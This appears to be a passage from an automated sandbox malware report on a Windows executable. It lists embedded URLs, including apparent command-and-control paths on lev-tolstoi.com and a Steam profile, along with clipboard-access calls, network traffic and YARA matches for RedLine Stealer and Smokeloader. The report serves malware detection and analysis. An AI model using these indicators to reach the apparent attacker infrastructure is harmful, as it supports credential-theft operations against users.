      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
      Source: HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apip
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiv1
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/outloo
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.nrM
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900lN
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
      Source: HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107370383.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
      Source: HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0

      System Summary

      barindex
      Source: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004088500_2_00408850
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0040ACF00_2_0040ACF0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004238600_2_00423860
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004388100_2_00438810
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041682D0_2_0041682D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004288CB0_2_004288CB
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043D8800_2_0043D880
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004218A00_2_004218A0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004309400_2_00430940
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004039700_2_00403970
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004209390_2_00420939
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004179C10_2_004179C1
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004231C20_2_004231C2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004241C00_2_004241C0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043B1D00_2_0043B1D0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004291DD0_2_004291DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043D9800_2_0043D980
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004059900_2_00405990
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004221900_2_00422190
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043D9970_2_0043D997
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043D9990_2_0043D999
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004091B00_2_004091B0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0042CA490_2_0042CA49
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0042DA530_2_0042DA53
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004162630_2_00416263
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0040EA100_2_0040EA10
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004152200_2_00415220
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0042CAD00_2_0042CAD0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004252DD0_2_004252DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041B2E00_2_0041B2E0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004062800_2_00406280
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043DA800_2_0043DA80
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041E2900_2_0041E290
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041CB400_2_0041CB40
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043D34D0_2_0043D34D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00426B500_2_00426B50
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043DB600_2_0043DB60
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00436B080_2_00436B08
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0042830D0_2_0042830D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0042CB110_2_0042CB11
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004043200_2_00404320
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0042CB220_2_0042CB22
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004253270_2_00425327
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004083300_2_00408330
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043F3300_2_0043F330
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0042A33F0_2_0042A33F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0040DBD90_2_0040DBD9
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004243800_2_00424380
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041FC750_2_0041FC75
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041DC000_2_0041DC00
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00429C2B0_2_00429C2B
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004291DD0_2_004291DD
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004074F00_2_004074F0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041148F0_2_0041148F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0042AC900_2_0042AC90
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043ECA00_2_0043ECA0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0040CD460_2_0040CD46
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004375000_2_00437500
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004225100_2_00422510
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00417DEE0_2_00417DEE
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00437DF00_2_00437DF0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004095800_2_00409580
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041759F0_2_0041759F
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00425E700_2_00425E70
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00436E740_2_00436E74
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004276030_2_00427603
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00425E300_2_00425E30
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004286C00_2_004286C0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043AEC00_2_0043AEC0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004266D00_2_004266D0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004236E20_2_004236E2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00405EE00_2_00405EE0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041DE800_2_0041DE80
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00402F500_2_00402F50
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00420F500_2_00420F50
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00438F590_2_00438F59
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004067100_2_00406710
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00423F200_2_00423F20
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043F7200_2_0043F720
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00419F300_2_00419F30
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0041E7C00_2_0041E7C0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004197C20_2_004197C2
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0042DFE90_2_0042DFE9
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0040A7800_2_0040A780
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_00411F900_2_00411F90
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004187920_2_00418792
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_004157990_2_00415799
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0043EFB00_2_0043EFB0
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007480550_2_00748055
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007680570_2_00768057
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0074E0E70_2_0074E0E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007560D70_2_007560D7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007670DB0_2_007670DB
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007531660_2_00753166
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007361470_2_00736147
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0076B1270_2_0076B127
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007421F70_2_007421F7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007511B70_2_007511B7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0074A1970_2_0074A197
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0075E2500_2_0075E250
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0074D2300_2_0074D230
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0076F2170_2_0076F217
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007523F70_2_007523F7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007594440_2_00759444
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007394170_2_00739417
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0074E4F70_2_0074E4F7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_007364E70_2_007364E7
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0074B5470_2_0074B547
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0075351D0_2_0075351D
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0076D5B40_2_0076D5B4
      Source: C:\Users\user\Desktop\HK8IIasL9i.exeCode function: 0_2_0076F5970_2_0076F597
